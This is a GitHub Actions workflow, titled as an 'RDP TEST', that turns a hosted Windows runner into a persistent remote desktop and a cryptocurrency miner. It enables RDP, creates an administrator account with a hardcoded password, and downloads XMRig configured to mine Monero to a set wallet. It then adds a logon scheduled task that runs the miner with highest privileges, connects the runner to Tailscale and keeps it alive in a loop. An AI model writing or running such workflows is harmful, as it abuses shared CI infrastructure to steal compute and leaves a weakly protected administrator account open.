name: RDP TEST with Admin Auto-Start Miner (MSR Enabled)

on:
  workflow_dispatch:

jobs:
  secure-rdp:
    runs-on: windows-latest
    timeout-minutes: 3600

    steps:
      - name: Configure Core RDP Settings
        shell: powershell
        run: |
          Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0 -Force
          netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389

      - name: Create RDP User with Static Password
        shell: powershell
        run: |
          $password = "Runner-12345"
          $securePass = ConvertTo-SecureString $password -AsPlainText -Force
          New-LocalUser -Name "RDP" -Password $securePass -AccountNeverExpires
          Add-LocalGroupMember -Group "Administrators" -Member "RDP"
          Add-LocalGroupMember -Group "Remote Desktop Users" -Member "RDP"
          echo "RDP_PASSWORD=$password" >> $env:GITHUB_ENV

      - name: Install and Configure XMRig Miner
        shell: powershell
        run: |
          $ErrorActionPreference = "Stop"
          $minerVersion = "6.21.2"
          $downloadUrl = "https://github.com/xmrig/xmrig/releases/download/v$($minerVersion)/xmrig-$($minerVersion)-msvc-win64.zip"
          $zipPath = "$env:TEMP\xmrig.zip"
          $desktopPath = "C:\Users\RDP\Desktop"
          
          New-Item -ItemType Directory -Force -Path $desktopPath
          Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath
          Expand-Archive -Path $zipPath -DestinationPath $desktopPath -Force
          
          $minerFolder = (Get-ChildItem -Path $desktopPath -Directory | Where-Object { $_.Name -like 'xmrig*' }).FullName
          if (-not $minerFolder) { throw "CRITICAL: Could not find extracted XMRig folder!" }
          
          $jsonContent = '{"autosave": true,"cpu": true,"opencl": false,"cuda": false,"pools": [{"algo": "rx/0","url": "pool.supportxmr.com:5555","user": "49UWTwnrxNXi8eMTCqdC5U3eiMHrPZkvvbsYN3WEde4o9RYebixumBCCy5oCdoSKkS2U6t9gXJFzJNkxXC7tJ1Uq4uky5BP","pass": "x"}]}'
          $jsonContent | ConvertFrom-Json | ConvertTo-Json -Depth 100 | Set-Content -Path (Join-Path $minerFolder "config.json")

          # The .bat file no longer needs a pause and will run silently in the background
          $batPath = Join-Path $desktopPath "Start-Miner.bat"
          $batContent = "@echo off`r`ncd /d ""$($minerFolder)""`r`nxmrig.exe"
          Set-Content -Path $batPath -Value $batContent

      - name: Auto-start Miner with Admin Privileges (Task Scheduler)
        shell: powershell
        run: |
          $ErrorActionPreference = "Stop"
          $taskName = "XMRigMinerAutoStart"
          $batPath = "C:\Users\RDP\Desktop\Start-Miner.bat"
          
          Write-Host "Creating a new Scheduled Task to run the miner with Admin privileges..."
          # This command creates a task that runs the .bat file on logon with the highest privileges.
          schtasks /create /TN $taskName /TR $batPath /SC ONLOGON /RL HIGHEST /F
          
          Write-Host "--- Verification Step ---"
          Write-Host "Querying task to confirm its creation:"
          schtasks /query /TN $taskName
          Write-Host "SUCCESS: Task Scheduler entry created. MSR should now be enabled on login."

      - name: Install Tailscale
        shell: powershell
        run: |
          Invoke-WebRequest -Uri "https://pkgs.tailscale.com/stable/tailscale-setup-latest.exe" -OutFile "$env:TEMP\tailscale.exe"
          Start-Process "$env:TEMP\tailscale.exe" -ArgumentList "/quiet" -Wait

      - name: Establish Tailscale Connection
        shell: powershell
        run: |
          & "$env:ProgramFiles\Tailscale\tailscale.exe" up --authkey=${{ secrets.TAILSCALE_AUTH_KEY }} --hostname=gh-runner-$env:GITHUB_RUN_ID
          Start-Sleep -Seconds 10
          $tsIP = & "$env:ProgramFiles\Tailscale\tailscale.exe" ip -4
          if (-not $tsIP) { throw "Tailscale IP not assigned." }
          echo "TAILSCALE_IP=$tsIP" | Out-File -FilePath $env:GITHUB_ENV -Encoding utf8 -Append
      
      - name: Display RDP Connection Details
        shell: powershell
        run: |
          Write-Host "================================================================"
          Write-Host "                 RDP ACCESS READY"
          Write-Host "================================================================"
          Write-Host "Tailscale IP Address: ${{ env.TAILSCALE_IP }}"
          Write-Host "Username: RDP"
          Write-Host "Password: ${{ env.RDP_PASSWORD }}"
          Write-Host "----------------------------------------------------------------"
          Write-Host "ACTION: The miner will now start automatically WITH ADMIN RIGHTS."
          Write-Host "You should see a higher hashrate with MSR enabled."
          Write-Host "================================================================"

      - name: Maintain Connection
        shell: powershell
        run: |
          while ($true) {
              Start-Sleep -Seconds 300
          }
